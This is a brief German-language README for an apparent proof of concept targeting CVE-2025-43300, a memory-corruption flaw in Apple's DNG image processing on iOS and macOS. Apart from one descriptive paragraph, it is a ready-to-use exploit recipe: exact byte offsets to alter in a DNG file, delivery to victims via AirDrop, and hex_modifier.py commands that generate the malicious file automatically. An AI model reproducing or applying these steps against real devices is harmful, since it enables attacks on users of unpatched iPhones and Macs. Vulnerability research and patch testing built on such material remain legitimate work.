
CVE-2025-43300: Speicherkorruption bei der iOS/macOS-DNG-Bildverarbeitung
CVE-2025-43300: Speicherkorruption in der DNG-Bildverarbeitung von iOS/macOS
Eine Schwachstelle in der Bildverarbeitung von Apple (RawCamera.bundle) betrifft iOS 18.6.1 und macOS. Das Problem tritt auf, wenn DNG-Dateien nicht übereinstimmende TIFF-Metadaten und JPEG-Lossless-Parameter enthalten, was zu Speicherkorruption führt.
Lade ein Bild in DNG-Auflösung herunter
Ändere die folgenden Bytes:
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
Airdrop usw.
# Create POC using known vulnerable offsets
python3 hex_modifier.py create-poc <input.dng>
# Manual byte modification
python3 hex_modifier.py modify <input.dng> <offset> <old_byte> <new_byte> <output.dng>
# Generate diff report
python3 hex_modifier.py diff <original.dng> <modified.dng>